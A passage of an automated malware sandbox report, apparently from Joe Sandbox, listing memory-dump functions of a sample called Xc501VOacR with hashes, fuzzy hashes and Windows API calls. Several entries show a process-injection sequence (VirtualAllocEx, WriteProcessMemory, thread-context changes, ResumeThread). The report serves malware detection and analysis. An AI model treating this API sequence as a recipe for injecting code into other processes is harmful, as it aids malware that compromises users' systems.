                                • Instruction ID: ea1aadd5833e315b8b869e176d862c8986e13172d09dd95707c8b7bbd6a6d63e
                                • Opcode Fuzzy Hash: 9dd3adc640f96c2c8d7437f05183e0eb5608ae53745f29721a8670e0dca65264
                                • Instruction Fuzzy Hash: 36F0F6317000114FC608AB7DA59893E76DBAFC9A243290099E50ACB3A5CD61DC0357D6
                                Function 082506E9 Relevance: 2.0, Strings: 1, Instructions: 783COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2707648230.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: Te]q
                                • API String ID: 0-52440209
                                • Opcode ID: 48c834e3a4bfa6d9f43ec6f9a6176224b28d87f95ea6efee261bfb94f31584d3
                                • Instruction ID: 4083aa7aae1f93b943bc2fecd9c7e0a7685ce965a22ebf4c3434c0dc978bfd95
                                • Opcode Fuzzy Hash: 48c834e3a4bfa6d9f43ec6f9a6176224b28d87f95ea6efee261bfb94f31584d3
                                • Instruction Fuzzy Hash: 91527F70A143258FC754FB78E89875DBBB6EB84304F8085A9D44CE7354EE389C99CB92
                                Function 02CD9048 Relevance: 1.7, Strings: 1, Instructions: 458COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: (o]q
                                • API String ID: 0-794736227
                                • Opcode ID: cdfbd08e790ce1f9e98cce2fbbe856eed2ad051ffd6b6db3d986fa63b2178719
                                • Instruction ID: 2aa8d70cb7116c7d0432d582eba5b3d94d48d2644bc626d49605286763acc89c
                                • Opcode Fuzzy Hash: cdfbd08e790ce1f9e98cce2fbbe856eed2ad051ffd6b6db3d986fa63b2178719
                                • Instruction Fuzzy Hash: 52126E79604106CFCB14CF68C588AAEBBF2FF88304F158669E606DB2A5D735ED81CB51
                                Function 0747BD65 Relevance: 1.7, APIs: 1, Instructions: 161memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0747BEAB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705387241.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7470000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 06a2f79f7e9d1dd92ded20751eb3c69554ca744cf1894b3efa27f3ddb44d8b85
                                • Instruction ID: edc42b9b750e0958dda264d459caaec19c1d2ad3ad23a72575773d62f6d21c3d
                                • Opcode Fuzzy Hash: 06a2f79f7e9d1dd92ded20751eb3c69554ca744cf1894b3efa27f3ddb44d8b85
                                • Instruction Fuzzy Hash: 9941E5BB6042889FCB01CB5AD4443CABBF1EBC9322F20846BD595DB201C2385986CFF1
                                Function 0601136C Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                Download Yara Rule
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0601148A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2704368226.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6010000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: 1463f66cdd21718c663b41dbcbfe2041b20f715b691f4379b746e74b99ffc3ed
                                • Instruction ID: 9822e8c624ad8e04342047d54f59e5a16f235302f8ff5b11c0010fee3dac4f68
                                • Opcode Fuzzy Hash: 1463f66cdd21718c663b41dbcbfe2041b20f715b691f4379b746e74b99ffc3ed
                                • Instruction Fuzzy Hash: F551BDB1D00309DFDB14CFA9D884ADEBFB5BF48314F24852AE919AB250D774A885CF91
                                Function 06011378 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                Download Yara Rule
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0601148A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2704368226.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6010000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: aeea293de14a8fc26c2b1968d2b3ab7893750ae1255b7aa59d614f717aa77cab
                                • Instruction ID: df4977a7b0afaba209f77cc46ca733edcd23f382556a5a15cfb2ddadbb74d1a8
                                • Opcode Fuzzy Hash: aeea293de14a8fc26c2b1968d2b3ab7893750ae1255b7aa59d614f717aa77cab
                                • Instruction Fuzzy Hash: 7641ACB1D003099FDB14CF9AC884ADEBFB5BF48314F24812AE919AB250D775A885CF90
                                Function 06010BCC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                Download Yara Rule
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 060139F1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2704368226.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6010000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID:
                                • API String ID: 2714655100-0
                                • Opcode ID: 5a1324d080070238ea1d0c30f27bbd85177a026b4f7853861e179574f3a7d438
                                • Instruction ID: 8616aec62b1c1fec8d63ea07ee9591df1207a5284567d1f4d00d867c632830d4
                                • Opcode Fuzzy Hash: 5a1324d080070238ea1d0c30f27bbd85177a026b4f7853861e179574f3a7d438
                                • Instruction Fuzzy Hash: 604147B4910205CFDB54CF99C888AAABFF9FF88314F24C459E559AB320D774A845CFA0
                                Function 078CE640 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                Download Yara Rule
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 078CE6D0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 54cd5268b7a6e5128e1f7845ccb20090c42ec8dd5da64e98a691e831fff76209
                                • Instruction ID: cf97e712a91a1bb49a097a298ec8a3de879752c61761c40b4ef55f81351f1212
                                • Opcode Fuzzy Hash: 54cd5268b7a6e5128e1f7845ccb20090c42ec8dd5da64e98a691e831fff76209
                                • Instruction Fuzzy Hash: 982139B19003099FCB10DFA9C885BEEBBF5FF48310F10842AE959A7240C7789944CBA0
                                Function 078CD818 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                Download Yara Rule
                                APIs
                                • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 078CD896
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: faa183cb166dbdb949be252fd5876a21e57fc0b87feca3118ea07a29a8221cee
                                • Instruction ID: 7c799349866643660275abf536c24d31f9c40dae71187f984234018242120375
                                • Opcode Fuzzy Hash: faa183cb166dbdb949be252fd5876a21e57fc0b87feca3118ea07a29a8221cee
                                • Instruction Fuzzy Hash: 4A2138B1D002098FDB10DFAAC5857EEBBF4EF48314F10842AD559A7240CB78A944CFA1
                                Function 078CF030 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                Download Yara Rule
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 078CF0AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 97309ae6d4859c8caaec2f3cf27acb19533b536dddd85ad068ab3048c0a28ed8
                                • Instruction ID: e87800868e9e117fd274538a45a04006fb7c574069165da8c5161a6bcf366598
                                • Opcode Fuzzy Hash: 97309ae6d4859c8caaec2f3cf27acb19533b536dddd85ad068ab3048c0a28ed8
                                • Instruction Fuzzy Hash: DD2135B29002098FDB10DFAAC4857EEBBF5EF48314F10842AD559A7240CB78A945CFA1
                                Function 0535CD59 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                Download Yara Rule
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0535CDE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2703407622.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5350000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 26daf857e732eb68eab25b6a0c51af06a82098ceede9ce935f772b03996b8f31
                                • Instruction ID: 2ebde1808bdef1891ce3291b7d3efe25ccb1e676f594dbf48f9633c946cf4dc8
                                • Opcode Fuzzy Hash: 26daf857e732eb68eab25b6a0c51af06a82098ceede9ce935f772b03996b8f31
                                • Instruction Fuzzy Hash: D021E6B59003489FDB10CF9AD585ADEBFF4FB49324F14841AE918A3350D378A940CFA1
                                Function 0535CD60 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0535CDE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2703407622.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5350000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: ba941dc411dd938e29a1e4dbda37621b51c6186039f44d2388c2f2d9fba6adb0
                                • Instruction ID: 02a1fcb75e6b13c519d69796d477c4e30b31ca5a9fd0a9dfee595dddc307feb9
                                • Opcode Fuzzy Hash: ba941dc411dd938e29a1e4dbda37621b51c6186039f44d2388c2f2d9fba6adb0
                                • Instruction Fuzzy Hash: 5C21C4B59002499FDB10CF9AD985ADEBFF9FB48324F14841AE918A3350D378A944CFA5
                                Function 078C4A40 Relevance: 1.6, APIs: 1, Instructions: 61memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 078C4ABB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 470fb77e8f04553dcf1d6f85395becc726e44c36d21b15d386865a659285f953
                                • Instruction ID: 06fb507c3b81a32d00609c17655ae0798d1780ac1373165d0376914403780e00
                                • Opcode Fuzzy Hash: 470fb77e8f04553dcf1d6f85395becc726e44c36d21b15d386865a659285f953
                                • Instruction Fuzzy Hash: D72108B59002499FCB10DF9AC484ADEFBF4FF49320F108429E958A7250D378A544CFA5
                                Function 078CED90 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 078CEE07
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 79ba8d3794cbcc42841dedcd408b515cb9480bbfb56db4b2a4859c712cdb9aed
                                • Instruction ID: b2492942006722626db46b614b92a2f21d1b2bce400bcdc48393f52a784838c6
                                • Opcode Fuzzy Hash: 79ba8d3794cbcc42841dedcd408b515cb9480bbfb56db4b2a4859c712cdb9aed
                                • Instruction Fuzzy Hash: 232127B1C002099FDB10DFAAC444AEEFBF5FF48320F50842AD519A7250DB79A945DFA1
                                Function 0823C5F8 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                Download Yara Rule
                                APIs
                                • DeleteFileW.KERNELBASE(00000000), ref: 0823C668
                                Memory Dump Source
                                • Source File: 00000000.00000002.2707451290.0000000008230000.00000040.00000800.00020000.00000000.sdmp, Offset: 08230000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8230000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: DeleteFile
                                • String ID:
                                • API String ID: 4033686569-0
                                • Opcode ID: 228d77894beccde2014553ad41927242c657d0133391990b56502cf682674d52
                                • Instruction ID: a9b31de94552effa5b0f515e1cdae241b781f1f01d67aa5edd497f47424273f4
                                • Opcode Fuzzy Hash: 228d77894beccde2014553ad41927242c657d0133391990b56502cf682674d52
                                • Instruction Fuzzy Hash: CB1106B1C0065A9FCB14DF9AC545A9EFBB4EF48720F15852AD818B7240D738AA44CFA5
                                Function 0747BE38 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0747BEAB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705387241.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7470000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: ac6e1d2b3e833e75b7ee2a057cca65812bcfcc0fb91fd23ec00db4793741018e
                                • Instruction ID: a493aee0005f06754da22cde2067c7f247308999e197180db40a91f9080045db
                                • Opcode Fuzzy Hash: ac6e1d2b3e833e75b7ee2a057cca65812bcfcc0fb91fd23ec00db4793741018e
                                • Instruction Fuzzy Hash: 3321B3B59002499FCB10DF9AD584ADEFBF8FF49320F10842AE958A7351D378A544CFA5
                                Function 078C4A48 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 078C4ABB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 2b89f5eb329637af94a067b5d4a1c2cae6440d505c5f18a928ebdf231549a63b
                                • Instruction ID: 0457bb156fe5c04e377829ecc38250586b531ef34d1e60eb5fd63202333d373a
                                • Opcode Fuzzy Hash: 2b89f5eb329637af94a067b5d4a1c2cae6440d505c5f18a928ebdf231549a63b
                                • Instruction Fuzzy Hash: B821E4B59002499FCB10DF9AC484BDEFBF4FF48320F14842AE958A7250D378A544CFA5
                                Function 078CDF00 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 078CDF6E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 24dd6616750e6a2b8d1456d0dea19e01c8b732d2492b0e47e1288c71be70a2c1
                                • Instruction ID: 9b1e0e861b130043bf014765e91605ef8dcee8039dd1cd9bc86fb125fffc07ce
                                • Opcode Fuzzy Hash: 24dd6616750e6a2b8d1456d0dea19e01c8b732d2492b0e47e1288c71be70a2c1
                                • Instruction Fuzzy Hash: 6C1137B19002499FCB10DFAAC844AEFBFF5FF48314F108819E519A7250C779A944CFA1
                                Function 078CF298 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 240e59708992a45c86388c7ad1b22786279ccdb2d772ae0aabe40b6ba2029024
                                • Instruction ID: 0bbd736aa530f68297cdaa93cb4bfc27c037047a38261c48226604f4181b12f6
                                • Opcode Fuzzy Hash: 240e59708992a45c86388c7ad1b22786279ccdb2d772ae0aabe40b6ba2029024
                                • Instruction Fuzzy Hash: 12113AB1D002498FDB10DFAAC4457EEFBF5EF88314F208819D519A7240CB79A544CBA4
                                Function 078CE138 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                Download Yara Rule
                                APIs
                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 078CF795
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: 88a22135df86db3516905cca92411bf58fc7c4acbe3778c2a67af626dda789e7
                                • Instruction ID: 7ff4ed1c1b9be95f962e827e064b339a8d82a2a3b3e5417cfa67065bf48a3f17
                                • Opcode Fuzzy Hash: 88a22135df86db3516905cca92411bf58fc7c4acbe3778c2a67af626dda789e7
                                • Instruction Fuzzy Hash: AE1106B6800349DFDB10DF99C485BDEBBF8EB59314F108459E958A7340C379A944CFA1
                                Function 02CD9848 Relevance: 1.5, Strings: 1, Instructions: 208COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q
                                • API String ID: 0-1259897404
                                • Opcode ID: 64c890073315d986384bd97739595bb1b30020b55de4af890b75d2303fe7d494
                                • Instruction ID: 9b4745da7b606b66fae73d586e9cc955eebd8b42adfa896327f57b5fc38610be
                                • Opcode Fuzzy Hash: 64c890073315d986384bd97739595bb1b30020b55de4af890b75d2303fe7d494
                                • Instruction Fuzzy Hash: 7661AE3A3141019FCB14DF3AD884A7A7BEAFF89604B05406AEA5ECB365DB31DC01CB60
                                Function 02CD7450 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: *
                                • API String ID: 0-163128923
                                • Opcode ID: 540b97b974eaf8afcd4af2e318cac6d4cfc3016d792e0924d0a8eda170b5ad3b
                                • Instruction ID: ab94804888954c2177f21ee6a71bc0a701936aab0ada5aedd0f626610866c783
                                • Opcode Fuzzy Hash: 540b97b974eaf8afcd4af2e318cac6d4cfc3016d792e0924d0a8eda170b5ad3b
                                • Instruction Fuzzy Hash: 0F61F0747042158FCB199F3AD49873ABAE6AFC8310F144869E642CB394EF34CD4ACB91
                                Function 02CD9638 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q
                                • API String ID: 0-1259897404
                                • Opcode ID: 25d94a20666a69334c5e3359334bf34f3a5a9bf7c6c10f73816352c605e916df
                                • Instruction ID: 6b1fe1f22e9f3a4138e90243637a2b15462a0fe12101d45043593b43ea4219d1
                                • Opcode Fuzzy Hash: 25d94a20666a69334c5e3359334bf34f3a5a9bf7c6c10f73816352c605e916df
                                • Instruction Fuzzy Hash: D04146796002059FCB149F69D888BAA7BB5FF88310F110469FA068B3B1CB70DD41CBA0
                                Function 02CDE1B7 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: Haq
                                • API String ID: 0-725504367
                                • Opcode ID: 40da80a8df6a51c5a6036a1b9897cbbad2557896478e2fa32a466e55b7454afc
                                • Instruction ID: 0774acb92994191e08b8a438ead7585329b810321c838ba4ce621a777ca31733
                                • Opcode Fuzzy Hash: 40da80a8df6a51c5a6036a1b9897cbbad2557896478e2fa32a466e55b7454afc
                                • Instruction Fuzzy Hash: BE41AE31304255DFCB169F69E858B7A3BA2EF88311B0944A9EA4ACB391CB34DD51CB91
                                Function 02CD5F78 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: 8aq
                                • API String ID: 0-538729646
                                • Opcode ID: 2ea11a93d3261981cd279448a5dbf8eef1c176537164ab88f8fa24066e90604b
                                • Instruction ID: b7ae37fe4256bfbc4c98b2495277e25a370c4cf7fc16bda3e623d39ae593992e
                                • Opcode Fuzzy Hash: 2ea11a93d3261981cd279448a5dbf8eef1c176537164ab88f8fa24066e90604b
                                • Instruction Fuzzy Hash: 8211B232B102418FC705DB79C498D6ABBE2EF9D3443958599E20ACF275EB36DC42CB01
                                Function 01251A39 Relevance: 1.3, APIs: 1, Instructions: 49COMMON
                                Download Yara Rule
                                APIs
                                • CloseHandle.KERNELBASE(?), ref: 01251A98
                                Memory Dump Source
                                • Source File: 00000000.00000002.2692986570.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: CloseHandle
                                • String ID:
                                • API String ID: 2962429428-0
                                • Opcode ID: 5b234b27fdebcaeed5d2aaa1ecce3a3bd192ef15b4a18f1d29290d85f8858a12
                                • Instruction ID: d801ed47aea9d2184f9796ee3b91e8c831cb2637ed923aebca2580a33d354dfa
                                • Opcode Fuzzy Hash: 5b234b27fdebcaeed5d2aaa1ecce3a3bd192ef15b4a18f1d29290d85f8858a12
                                • Instruction Fuzzy Hash: CE1125B18002498FDB10DF9AC549BEEBBF4EB48320F10841AD958A7340D338A984CFA5
                                Function 01251A40 Relevance: 1.3, APIs: 1, Instructions: 47COMMON
                                Download Yara Rule
                                APIs
                                • CloseHandle.KERNELBASE(?), ref: 01251A98
                                Memory Dump Source
                                • Source File: 00000000.00000002.2692986570.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: CloseHandle
                                • String ID:
                                • API String ID: 2962429428-0
                                • Opcode ID: 6b9818be37e4f4cf29d054362c7b503aac8bf2b61ee06082c10c3cdc63da9ae6
                                • Instruction ID: a0c7444e163f6f62b33d4efecf85b56c2871c8e16aea62273a065027147a696e
                                • Opcode Fuzzy Hash: 6b9818be37e4f4cf29d054362c7b503aac8bf2b61ee06082c10c3cdc63da9ae6
                                • Instruction Fuzzy Hash: F21103B58002498FDB10DF9AC585BEEBBF4EB48320F10841AD958A7340D738A584CFA5
                                Function 08254308 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2707648230.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: 43^q
                                • API String ID: 0-2065357395
                                • Opcode ID: eab801e5633a8eac4013bd0d2c75f96565991e5ce2dd7bc5740780c107b2d321
                                • Instruction ID: dbcc8ddd9d3649fbbdbe38496ca959297bd5ce85caa4f54425ab4e455ac01209
                                • Opcode Fuzzy Hash: eab801e5633a8eac4013bd0d2c75f96565991e5ce2dd7bc5740780c107b2d321
                                • Instruction Fuzzy Hash: 29E022297043800FD3091A72A4A926E3F57EFC1221F0888ABE481CB384CC6988098780
                                Function 0825E634 Relevance: .5, Instructions: 469COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2707648230.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: de97784ab54d525335d40531260e77d0d0b431052329c2874c71c47373e4d5ae
                                • Instruction ID: 003b1a88718e80bc73697e190497a5154d93b12c633140e93011ed89b5e53cb5
                                • Opcode Fuzzy Hash: de97784ab54d525335d40531260e77d0d0b431052329c2874c71c47373e4d5ae
                                • Instruction Fuzzy Hash: 46026C70A28205CFCB04AF78EA9929DBBF2FF88304F544469E84AE7745EE385C45CB51
                                Function 0825D789 Relevance: .4, Instructions: 433COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2707648230.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 165d4762cf046612f4be03232adf1671f1b04c870d004c1738666cd87bee91b4
                                • Instruction ID: c43c7b8c2c6bb2055a64695fae73463f1ce629ccdf877e88a4b8fc279138a4ed
                                • Opcode Fuzzy Hash: 165d4762cf046612f4be03232adf1671f1b04c870d004c1738666cd87bee91b4
                                • Instruction Fuzzy Hash: A9E1F3716183118FC305BB78E89821D7BF2EF86314F85897DD489DB395DA389C4ACB92
                                Function 0825CAD0 Relevance: .4, Instructions: 413COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2707648230.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0cb04c35830a7d06b3502d0aa4a7d0a04643e452cd5145a20be33900712d16df
                                • Instruction ID: 49fbafc8c52043d88c4b2758f7e551c7423ca4c204ebb37fdd70388f29d1608c
                                • Opcode Fuzzy Hash: 0cb04c35830a7d06b3502d0aa4a7d0a04643e452cd5145a20be33900712d16df
                                • Instruction Fuzzy Hash: 68E17071A24215CFC704FFB8E89966D7BB2EB85304F814979D449E7344DE389C8AC792
                                Function 0825E94B Relevance: .3, Instructions: 334COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2707648230.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
